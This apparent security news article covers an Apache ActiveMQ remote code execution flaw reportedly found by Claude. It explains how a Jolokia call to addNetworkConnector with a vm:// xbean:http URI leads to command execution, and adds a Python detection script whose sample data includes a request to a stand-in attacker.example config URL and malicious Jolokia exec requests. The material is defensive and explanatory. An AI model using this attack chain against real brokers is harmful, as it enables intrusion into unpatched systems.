AI Uncovers 13-Year-Old Critical RCE Vulnerability in Apache ActiveMQ
A critical remote code execution (RCE) vulnerability, designated as CVE-2026-34197, has been identified in Apache ActiveMQ Classic. This flaw, which remained undetected for over a decade, was discovered by Anthropic’s AI model, Claude, in under 10 minutes.
Vulnerability Details
The vulnerability resides in ActiveMQ Classic’s Jolokia JMX-HTTP bridge, accessible via the web console at `/api/jolokia/` on port 8161. It allows authenticated attackers to invoke the `addNetworkConnector(String)` management operation on the broker’s MBean, supplying a crafted VM transport URI with an attacker-controlled `brokerConfig=xbean:http://` parameter.
When processed, ActiveMQ’s VM transport layer creates an embedded broker by calling `BrokerFactory.createBroker()` with the attacker-supplied URL. The `xbean:` scheme then hands the URL to Spring’s `ResourceXmlApplicationContext`, which instantiates every bean definition in the remote XML file. Because a bean definition can use Spring’s `MethodInvokingFactoryBean` to call `Runtime.getRuntime().exec()`, this results in arbitrary OS command execution.
Root Cause Analysis
The root cause traces back to a remediation for CVE-2022-41678, where Apache added a blanket Jolokia allow rule for all operations on ActiveMQ’s own MBeans (`org.apache.activemq:`) to preserve web console functionality. This decision inadvertently exposed every management operation, including `addNetworkConnector`, as an attack surface through Jolokia’s REST API.
Authentication Concerns
While CVE-2026-34197 requires valid credentials in most deployments, default credentials (`admin:admin`) are widely present across enterprise environments. More critically, organizations running ActiveMQ versions 6.0.0 through 6.1.1 are exposed to a fully unauthenticated RCE path. A separate flaw, CVE-2024-32114, inadvertently stripped the authentication constraints from the `/api/` path in those versions, so the Jolokia endpoint requires no credentials at all and CVE-2026-34197 becomes a no-auth RCE on those builds.
Historical Context
ActiveMQ has a well-documented history of being targeted in the wild. Both CVE-2016-3088 (authenticated RCE via the web console) and CVE-2023-46604 (unauthenticated RCE via the broker port) are listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog.
AI’s Role in Discovery
Researchers at Horizon3.ai credited Anthropic’s Claude AI with identifying the flaw during an AI-assisted source code review. By providing Claude with a lightweight vulnerability-hunting prompt and a live target for validation, the team enabled the AI to trace the multi-component attack chain spanning Jolokia, JMX, network connectors, and VM transports in approximately 10 minutes. Analysts noted this chain would likely have taken a skilled human researcher an entire week to map manually, underscoring how AI models are fundamentally lowering the barrier for vulnerability research.
Mitigation Measures
Organizations should monitor ActiveMQ broker logs for entries referencing `vm://` URIs containing `brokerConfig=xbean:http`, POST requests to `/api/jolokia/` with `addNetworkConnector` in the body, and unexpected outbound HTTP connections from the ActiveMQ process. Defenders should also watch for unusual child processes spawned by the ActiveMQ JVM.
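As an added example (not code from the article, Horizon3.ai or the ActiveMQ project), the following Python checks constructed broker log lines and HTTP request records for the first two indicators above; it goes slightly beyond the article's list by percent-decoding before matching and by checking the Jolokia GET-style request path as well as POST bodies. The log line layout, the `{'method', 'path', 'body'}` request shape and the `attacker.example` host are assumptions.

```python
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# Indicators from the article's mitigation guidance
VM_XBEAN_PATTERN = re.compile(r"vm://[^\s|\"']*brokerConfig=xbean:http", re.IGNORECASE)
JOLOKIA_PATH = "/api/jolokia"
SUSPICIOUS_OPERATION = "addnetworkconnector"  # compared lower-cased

def normalize(text: str) -> str:
    """Percent-decode twice so 'xbean%3Ahttp' or double-encoded forms match the plain indicator."""
    return unquote(unquote(text))

def scan_broker_log(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Flag broker log lines referencing a vm:// URI that carries brokerConfig=xbean:http."""
    findings = []
    for line in lines:
        match = VM_XBEAN_PATTERN.search(normalize(line))
        if match:
            findings.append(("broker-log", "vm:// URI with brokerConfig=xbean:http", match.group(0)))
    return findings

def scan_http_requests(requests: Iterable[dict]) -> List[Tuple[str, str, str]]:
    """Flag requests to the Jolokia endpoint naming addNetworkConnector in the path
    (Jolokia GET style) or body (POST style). Requests are constructed dicts
    {'method', 'path', 'body'} as a reverse proxy or WAF would expose them."""
    findings = []
    for req in requests:
        path, body = normalize(req["path"]), normalize(req.get("body", ""))
        if not path.lower().startswith(JOLOKIA_PATH):
            continue  # traffic to other paths is out of scope for this rule
        if SUSPICIOUS_OPERATION in (path + body).lower():
            findings.append(("http", f"{req['method']} {JOLOKIA_PATH} invoking addNetworkConnector", req["path"]))
    return findings

# Constructed sample data, not real logs; attacker.example is a placeholder host
SAMPLE_BROKER_LOG = [
    "2026-04-01 10:00:01,000 | INFO | Establishing network connection from vm://localhost?create=false | ...",
    "2026-04-01 10:00:02,000 | INFO | Establishing network connection from vm://localhost?brokerConfig=xbean%3Ahttp://attacker.example/c.xml | ...",
]
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/api/jolokia/", "body": '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost"}'},
    {"method": "POST", "path": "/api/jolokia/", "body": '{"type":"exec","operation":"addNetworkConnector", ...}'},
    {"method": "GET", "path": "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetwork%43onnector/...", "body": ""},
    {"method": "GET", "path": "/admin/network.jsp", "body": ""},
]

if __name__ == "__main__":
    for source, reason, evidence in scan_broker_log(SAMPLE_BROKER_LOG) + scan_http_requests(SAMPLE_REQUESTS):
        print(f"[{source}] {reason}: {evidence}")
```

The benign console read request and the `create=false` connection line are left alone, while the percent-encoded variants are still caught because matching happens after decoding.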
The vulnerability is patched in ActiveMQ Classic versions 5.19.4 and 6.2.3. The fix removes the ability for `addNetworkConnector` to register `vm://` transports via the Jolokia API entirely. All organizations running affected versions should update immediately and audit deployments for default credential usage across all ActiveMQ instances.